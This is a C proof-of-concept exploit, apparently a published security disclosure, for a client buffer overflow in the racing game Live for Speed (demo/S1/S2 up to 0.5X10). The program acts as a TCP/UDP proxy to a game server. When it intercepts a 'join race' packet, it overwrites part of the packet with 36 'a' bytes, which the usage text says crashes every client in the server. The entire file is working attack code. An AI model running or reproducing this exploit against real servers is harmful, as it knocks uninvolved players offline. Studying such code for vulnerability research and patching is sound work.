/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        63392
#define BINDPORT    63333
#define SENDTO(a,b,c,d) \
                    if(sendto(a, b, c, 0, (struct sockaddr *)d, sizeof(struct sockaddr_in)) \
                      < 0) std_err();
#define RECVFROM(a,b,c,d) \
                    len = recvfrom(a, b, c, 0, (struct sockaddr *)d, &psz); \
                    if(len < 0) break;



int tcp_socket(struct sockaddr_in *peer);
int udp_socket(struct sockaddr_in *peer);
int big_socket(int first, ...);
void miniproxy(struct sockaddr_in *peer, struct sockaddr_in *peerl);
int send_lfs(int sock, u8 *data, u8 len);
int recv_lfs(int sock, u8 *buff);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer,
                        peerl;
    u16     port = PORT;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Live for Speed demo/S1/S2 <= 0.5X10 clients buffer-overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <server> [port(%hu)]\n"
            "\n"
            "This proof-of-concept acts as a basic proxy (datapipe) server which sends the\n"
            "malformed data when a \"join race\" packet is intercepted:\n"
            "you -> lfscbof -> server\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr  = resolv(argv[1]);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    peerl.sin_addr.s_addr = INADDR_ANY;
    peerl.sin_port        = htons(BINDPORT);
    peerl.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    miniproxy(&peer, &peerl);
    return(0);
}



int tcp_socket(struct sockaddr_in *peer) {
    int     sd,
            psz,
            on = 1;

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(!peer) return(sd);

    printf("- bind %s:%hu\n",
        inet_ntoa(peer->sin_addr), ntohs(peer->sin_port));

    if(peer->sin_port) {
        if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
          < 0) std_err();
    }

    if(bind(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
      < 0) std_err();

    psz = sizeof(struct sockaddr_in);
    if(getsockname(sd, (struct sockaddr *)peer, &psz)
      < 0) std_err();

    if(listen(sd, SOMAXCONN)
      < 0) std_err();

    return(sd);
}



int udp_socket(struct sockaddr_in *peer) {
    int     sd,
            psz;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    if(!peer) return(sd);

    if(bind(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
      < 0) std_err();

    psz = sizeof(struct sockaddr_in);
    if(getsockname(sd, (struct sockaddr *)peer, &psz)
      < 0) std_err();

    return(sd);
}



int big_socket(int first, ...) {
    va_list ap;
    int     big;

    big = first;
    va_start(ap, first);
    while((first = va_arg(ap, int))) {
        if(first > big) big = first;
    }
    va_end(ap);
    return(big);
}



void miniproxy(struct sockaddr_in *peer, struct sockaddr_in *peerl) {
    fd_set  rset;
    int     sdu,
            sdul,
            sd,
            sdl,
            sdb,
            selsock,
            len,
            psz;
    u8      buff[0xff];

    psz = sizeof(struct sockaddr_in);

    sdb  = tcp_socket(peerl);
    sdul = udp_socket(peerl);
    sdu  = udp_socket(NULL);

    SENDTO(sdu, "LFS\0", 4, peer);

redo:
    printf("\n"
        "- now join the server 127.0.0.1 on port %hu\n"
        "  when you will partecipate to the race any client in the server will crash\n",
        ntohs(peerl->sin_port));

    sdl = accept(sdb, (struct sockaddr *)peerl, &psz);
    if(sdl < 0) std_err();
    printf("- incoming client %s:%hu\n", inet_ntoa(peerl->sin_addr), ntohs(peerl->sin_port));

    sd  = tcp_socket(NULL);
    if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
     < 0) std_err();

    selsock = 1 + big_socket(sd, sdl, sdu, sdul, 0);

    for(;;) {
        FD_ZERO(&rset);
        FD_SET(sd,   &rset);
        FD_SET(sdl,  &rset);
        FD_SET(sdu,  &rset);
        FD_SET(sdul, &rset);
        if(select(selsock, &rset, NULL, NULL, NULL)
          < 0) std_err();

        if(FD_ISSET(sd, &rset)) {
            len = recv_lfs(sd, buff);
            if(len < 0) break;
            if(send_lfs(sdl, buff, len) < 0) break;
        }
        if(FD_ISSET(sdl, &rset)) {
            len = recv_lfs(sdl, buff);
            if(len < 0) break;

            if((len > 0x60) && (buff[5] == 0xd4) && (buff[6] == 0x05)) {
                memset(buff + 50, 'a', 36);
                printf("- exploit activated\n");
            }
            if(send_lfs(sd, buff, len) < 0) break;
        }
        if(FD_ISSET(sdu, &rset)) {
            RECVFROM(sdu, buff, sizeof(buff), peer)
            SENDTO(sdul, buff, len, peerl)
        }
        if(FD_ISSET(sdul, &rset)) {
            RECVFROM(sdul, buff, sizeof(buff), peerl)
            SENDTO(sdu, buff, len, peer)
        }
    }

    close(sdl);
    close(sd);
    printf("- connection closed or lost\n");
    goto redo;
}



int send_lfs(int sock, u8 *data, u8 len) {
    u8      buff[256];

    buff[0] = len;
    memcpy(buff + 1, data, len);
    if(send(sock, buff, len + 1, 0) != (len + 1)) return(-1);
    return(0);
}



int recv_lfs(int sock, u8 *buff) {
    int     t;
    u8      len = 0,
            size;

    if(recv(sock, &size, 1, 0) <= 0) return(-1);

    while(len < size) {
        t = recv(sock, buff + len, size - len, 0);
        if(t <= 0) return(-1);
        len += t;
    }
    return(len);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


